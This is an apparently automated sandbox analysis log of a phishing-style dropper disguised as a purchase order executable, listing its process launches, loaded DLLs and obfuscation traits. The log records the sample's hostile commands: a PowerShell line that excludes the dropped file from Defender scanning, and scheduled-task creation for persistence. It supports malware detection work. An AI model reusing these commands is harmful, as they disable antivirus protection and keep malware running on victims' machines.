                      Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Process created: C:\Users\user\AppData\Roaming\keHuNxIumw.exe "C:\Users\user\AppData\Roaming\keHuNxIumw.exe"
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe"
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp"
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Process created: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe"
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmpB43C.tmp"
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess created: C:\Users\user\AppData\Roaming\keHuNxIumw.exe "C:\Users\user\AppData\Roaming\keHuNxIumw.exe"Jump to behavior
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Supplier Purchase Order - PO0002491.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Supplier Purchase Order - PO0002491.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Supplier Purchase Order - PO0002491.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ldPH.pdb | source: Supplier Purchase Order - PO0002491.exe, keHuNxIumw.exe.0.dr
Source: Binary string: ldPH.pdbSHA256 | source: Supplier Purchase Order - PO0002491.exe, keHuNxIumw.exe.0.dr

Data Obfuscation

Source: 0.2.Supplier Purchase Order - PO0002491.exe.7aa0000.3.raw.unpack, at4ONG9F0NYCELN5Tj.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{cPRyvIfYviaTKciquO(typeof(IntPtr).TypeHandle),cPRyvIfYviaTKciquO(typeof(Type).TypeHandle)})
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, mqshXHrVQ97YMT4tEt.cs | .Net Code: SatqKrZb18 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, mqshXHrVQ97YMT4tEt.cs | .Net Code: SatqKrZb18 System.Reflection.Assembly.Load(byte[])
Source: Supplier Purchase Order - PO0002491.exe | Static PE information: 0xB86C7B99 [Wed Jan 18 13:01:13 2068 UTC]
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CBE1
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_07BD6773 push esp; ret 0_2_07BD6779
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_07BDB3B8 push eax; iretd 0_2_07BDB3B9
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_07BD1168 pushfd ; iretd 0_2_07BD116A
Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_07BD116B pushfd ; iretd 0_2_07BD1172
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00457186 push ecx; ret 12_2_00457199
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0045E55D push esi; ret 12_2_0045E566
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00457AA8 push eax; ret 12_2_00457AC6
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00434EB6 push ecx; ret 12_2_00434EC9
Source: Supplier Purchase Order - PO0002491.exe | Static PE information: section name: .text entropy: 7.778713534955087
Source: keHuNxIumw.exe.0.dr | Static PE information: section name: .text entropy: 7.778713534955087
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, zThQNep4lwKpE9O0BC.cs | High entropy of concatenated method names: 'Dispose', 'IVvmVIIR1M', 'Mgyac1W0Ni', 'odZCCOH7n7', 'tmqmke9fTd', 'IOXmzWOSgt', 'ProcessDialogKey', 'KiDaowKvbu', 'J5wam7HO6p', 'EhAaalCU4s'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, yxWKBchUKSW06bE2hl.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'sL5aVpGmWE', 'E88akydsJv', 'D2ZazZa652', 'grEFot43Fo', 'HuCFmoLnNh', 'NqGFaemGDc', 'nmPFF1JFgj', 'lRlpJUbu05kK3ucJ2eT'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, jSRC5wmFTKLEbN6j3uU.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E3QI1gbo2N', 'cBJIH5hZ68', 'vCAID9YLXY', 'WF7IXecOcY', 'Ew5IZjgmQX', 'dy2IOjm3KJ', 'NyaIG76mDc'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, iMftbjagvPfJN33VjN.cs | High entropy of concatenated method names: 'n7DKFjTcd', 'MQBgkVi0a', 'kjt2lIfSV', 'A6d7C0rQR', 'h2cuIApkO', 'OJHYAGyMw', 'qB7g6Rvopn3Fh7amJY', 'exSZfKGYpynCQmkJC4', 'dUr4G2dHd', 'Y8sI5EgbP'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, hp0xu9CEYuFdg9g0GR.cs | High entropy of concatenated method names: 'uHAN0Z89Li', 'w1pNpM6jW5', 'K0YNtltfjs', 'e5ENJb1olu', 'RwpNr3m8ak', 'nLBtZMs5Pu', 'whKtOcRkRB', 'rlitG6I5I2', 'bi1tyuZZMC', 'rGXtVQbxlw'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, aqe9fTydROXWOSgtfi.cs | High entropy of concatenated method names: 'uKI4Ttq2Ch', 'IEn4prwncB', 'i9P4hNexxl', 'sPN4tLbKWj', 'pNJ4NJjEN3', 'EHm4Jb0kB6', 'nH94rEtJdU', 'k7O4drI1y7', 'bqE48mhZMZ', 'F5U4lWH5UX'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, Pl9B1MLSEJ7M2ACnEo.cs | High entropy of concatenated method names: 'wwbJ99GRes', 'xjPJQYB2FZ', 'lNUJKw7CIM', 'E2UJgYmYfD', 'eVbJA8W6yd', 'JMKJ2PdaAm', 'vHuJ7tooSi', 'WxMJxRcO8o', 'ixPJuP0boK', 'Nt5JYbA1sl'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, hvqSVpzqu3tDJb0msV.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GF96wMEv8d', 'zi16BBgxtZ', 'IcP6bavk3W', 'uaC6ef16Pp', 'qaV64GIiyC', 'bVE66R39uM', 'vi36IwljWQ'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, Wk3seexTX6tZtWvfvc.cs | High entropy of concatenated method names: 'gUap1I936I', 'LVtpH9Hl19', 'hUFpDcwaS5', 'KKlpXHc9wX', 'BCfpZuJceM', 'MPVpOXCWxq', 'j8xpGEymhV', 'YZfpyII8vk', 'lFBpV8QB69', 'AR3pkhOUi8'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, nCU4sZkk0cO2A8tXZc.cs | High entropy of concatenated method names: 'vyW6mKeDls', 'mTI6FV3tM9', 'JQF6qlZjZ9', 'kXF6TMnp9N', 'QQT6pgcotf', 'VEl6tMIp0X', 'mx16NArRmY', 'VZx4GpRdM5', 'L3P4yYZWRa', 'A334VX4XmO'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, A2kagZuBKmr6hPQEK1.cs | High entropy of concatenated method names: 'CxjhgV2aiq', 'mrWh2rhnVj', 'lWvhxNbcyy', 'uXIhuhBqn4', 'NcChBOZOXJ', 'D3YhbIHdd4', 'yFGheoM6is', 'JfWh4FHFYT', 'BMLh6Sin2Z', 'eouhIH49yc'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, oMIwwyvsoaXJBe3Isf.cs | High entropy of concatenated method names: 'v5xwx6xUrw', 'JYTwuRXSQq', 'NR6wCi5SUc', 'oBxwcIWNDC', 'SECwRn51D6', 'Es6wnUOcs7', 'bFtwjU1NQu', 'a2pwEdV2fU', 'AfcwMFlOhK', 'AILwPnq0Ge'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, TPnZ5FqOFg4XKETJii.cs | High entropy of concatenated method names: 'hHymJk3see', 'fX6mrtZtWv', 'UBKm8mr6hP', 'yEKml10GOG', 'I3rmBjhtp0', 'Du9mbEYuFd', 'O6JxNGNyLUgiZhCBWG', 'eyanw6kIPronvWbG9s', 'WLJmmRZBX6', 'TxZmFJOqf3'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, mqshXHrVQ97YMT4tEt.cs | High entropy of concatenated method names: 'vQlF0Xtbdf', 'mjtFTBIrUK', 'i7aFpN1waN', 'RxnFhn6v4O', 'Fu2FtJoDg8', 'yOHFNTE3l4', 'SfxFJcneKm', 'vPXFrcCMD9', 'TpVFdKGvhM', 'aqJF8EJ72u'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, UyWKgQ194m00G4siGn.cs | High entropy of concatenated method names: 'TLmBM5EW1j', 'NmqBSaWvPf', 'e6PB11gqei', 'GuFBHyCCPo', 'dYrBc2bTGj', 'SaGB3ZEH7B', 'jIEBRZlEJB', 'YNuBnrICp1', 'HowBf8pMhZ', 'fiYBjlersV'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, By6nk7mohiH0nFI8D7E.cs | High entropy of concatenated method names: 'B4N69yyWvw', 'F9H6QO3uwv', 'ihD6KZY5XZ', 'WbE6gkY5C9', 'T7F6Awd36a', 'eYt620mLUA', 'eDq67eR8X7', 'KFk6xT4DMt', 'oGl6uXvnRx', 'ATf6YgcUMK'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, EDq8ZKXlx7nTMbYoVg.cs | High entropy of concatenated method names: 'thge8r8vDf', 'EPpelhiNVV', 'ToString', 'pnweTBLsSF', 'n2Eep6EWIX', 'e1jehG3I2p', 'hK1etG8HIg', 'TTReNPVs8u', 'fbyeJrFwNd', 'cWferelp5C'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, qqEwOsO3tIS0TnFlkC.cs | High entropy of concatenated method names: 'h7key4dxrs', 'zSgekRjLuE', 'ja64o2TyU9', 'tm94mjFxFQ', 'eKjePuCmEE', 'V4MeSfkv68', 'TTXevjOjPp', 'QoWe1LQAls', 'twPeHCJTP5', 'hVVeDOh6Cn'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.7aa0000.3.raw.unpack, MainForm.cs | High entropy of concatenated method names: 'YgSHuitkd', 'aiP2N9Y7C', 'gHQx79i6W', 'AGv9PUWi3', 'QMsbTCblb', 'beIGikGSa', 'clTPOt4ON', 'fF0vNYCEL', 'C5TCjFvvv', 'ln3BTm5Rw'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.7aa0000.3.raw.unpack, at4ONG9F0NYCELN5Tj.cs | High entropy of concatenated method names: 'nVoxarmF975Urj2p8sJ', 'tIta6WmWAkGE6iVCWgt', 'Y8N2DklRel', 'hpreq0m6Xcu1pidWj9b', 'KFC0XvmT5N8D2LR210h', 'a5foommXYpDAHBV6LjL', 'd3wYgimbV84NAc2fo7p', 'ItvPp5mqvV1adE08UOg', 'KA7rbWmJ0EMRNxYE2Vd', 'PPtPBAmQMyT7QpfjJpI'
